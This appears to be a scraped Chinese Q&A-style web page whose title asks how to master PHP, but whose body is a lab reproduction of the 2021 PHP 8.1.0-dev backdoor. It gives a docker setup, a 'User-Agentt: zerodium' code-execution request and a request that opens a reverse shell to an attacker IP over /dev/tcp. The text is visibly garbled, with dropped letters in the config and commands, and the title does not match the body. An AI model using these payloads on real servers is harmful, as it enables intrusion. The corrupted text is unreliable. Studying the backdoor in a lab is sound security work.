当前位置:首页 > 每日看点 > 正文内容

怎样深入学习php,成为php高手?

卡卷网12个月前 (01-01)每日看点178

简介

PHPverion8.1.0-dev于2021年3月28与后门一起发布,但是后门很快被发现并删除。

#漏洞概述

PHPverion8.1.0-dev的PHP在上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。

#影响版本

PHP8.1.0-dev

#环境搭建

新建docker-compose.yml

version:'2' servs: we: image:vulhu/php:8.1-ackdoor volumes: -./index.php:/var/www/html/index.php ports: -"8080:80"

启动环境

docker-composeup-d

#漏洞复现

#poc验证

在header头增加user-agentt字段,值为:zerodiumvar_dump(2*3);

GET//1.1 Host:192.168.81.223:8800 Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 user-agentt:zerodiumvar_dump(2*3); Connection:close

如果执行了这个表达式,说明存在漏洞

#执行命令反弹shell

GET//1.1 Host:192.168.81.223:8800 Praa:no-cache Cache-Control:no-cache Upgrade-Insece-Requests:1 User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWeKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.77Safari/537.36 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/if,image/wep,image/apng,*/*;q=0.8,application/signed-exchange;v=3;q=0.9 Accept-Encoding:gzip,deflate User-Agentt:zerodium("ash-c'execash-i>&/dev/tcp/ip/66660>&1'"); Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,en-US;q=0.6 Connection:close

#事件分析与反思

代码中含有”zerodium”字符串,而zerodium是一个专门漏洞的.在此事件中,怀疑黑客攻陷了://git.php.net,以PHP作者的名义做了两次代码提交。

#参考文章

s://log.dn.net/zy15667076526/article/details/116447864

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2025/01/6068.html

分享给朋友:
返回列表

上一篇:怎么速成C#?

下一篇:浏览器点击网页有中病的风险么,不下载文件执行能保证安全么?

相关文章

网易云音乐上看到过最触动的热评是什么?

网易云音乐上看到过最触动的热评是什么?

1.“昨天晚上洗澡的时候,我忘记拿毛巾了,喊了声妈妈帮我拿下毛巾,正当我伸出左手准备接毛巾的时候,我愣了一下,又换了右手。”希望你永远不会听懂这句话,永远都不要懂。——网易云热评《关键词》2.小时候跟着父亲去城里卖西瓜,害怕同学会看到我,就...

腾讯云为何在云服务市场败给了阿里云?

IDC领域,2010年以前,万网、新网互联、新网,三家公司瓜分天下,其中万网市场份额最高,排名第一。当时,万网的域名是http://www.net.cn,通过该域名就可以判断万网的地位。2010年阿里云成立,直接收购了万网,大量用户直接流向...

怎样使自己处于高能量状态?

1、不要习惯性的回顾过去那些让你尴尬和犯了错误的事情,不要嫌弃自己蠢。学会原谅自己,当你不断回忆那些错误和囧事的时候,告诉自己:自己确实做错了,下次不要再犯即可,不需一遍遍的回忆。这件事情已经发生,不要再一遍遍的折磨自己,不断回忆一点好处没...

你觉得oppo Find X8怎么样?

你觉得oppo Find X8怎么样?

OPPO FindX8发布也差不多一个月了,各位上手体验如何呢?作为OPPO的年度旗舰,性能,外观,屏幕等方面都有不小的提升,篇幅有限,下面挑最值得讲的两个点,就是OPPO Find X8的外观和影像。众所周知,这次OPPO Find X8...

我怎么也无法理解网络游戏为什么会有外挂?

我怎么也无法理解网络游戏为什么会有外挂?

因为你把服务器想象成了无所不能的上帝;但在我们程序猿眼里,服务器不过是一个黑大傻粗的计算器。比如说,我们在某个位置打开一个宝箱:那么,你觉得,程序背后应该做了些什么呢?一、天真的玩法天真的程序猿会觉得,啊,这事简单!我就告诉服务器,用户ID...

我真的需要有人帮我选耳机!!如何挑选第一款头戴式耳机?

我真的需要有人帮我选耳机!!如何挑选第一款头戴式耳机?

挑选第一款头戴式耳机时,应综合考虑多个因素。‌首要考虑的是佩戴舒适度,其次是音质、降噪效果、续航能力和蓝牙版本‌。‌佩戴舒适度‌:选择轻量化设计,单耳重量不超过200克,材质柔软透气,如亲肤仿蛋白皮,以提升佩戴舒适度。‌音质‌:大尺寸的音频...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。

Copyright © 2019-2024 www.kajuan.net 版权所有

Powered By Z-BlogPHP. Theme by TOYEAN.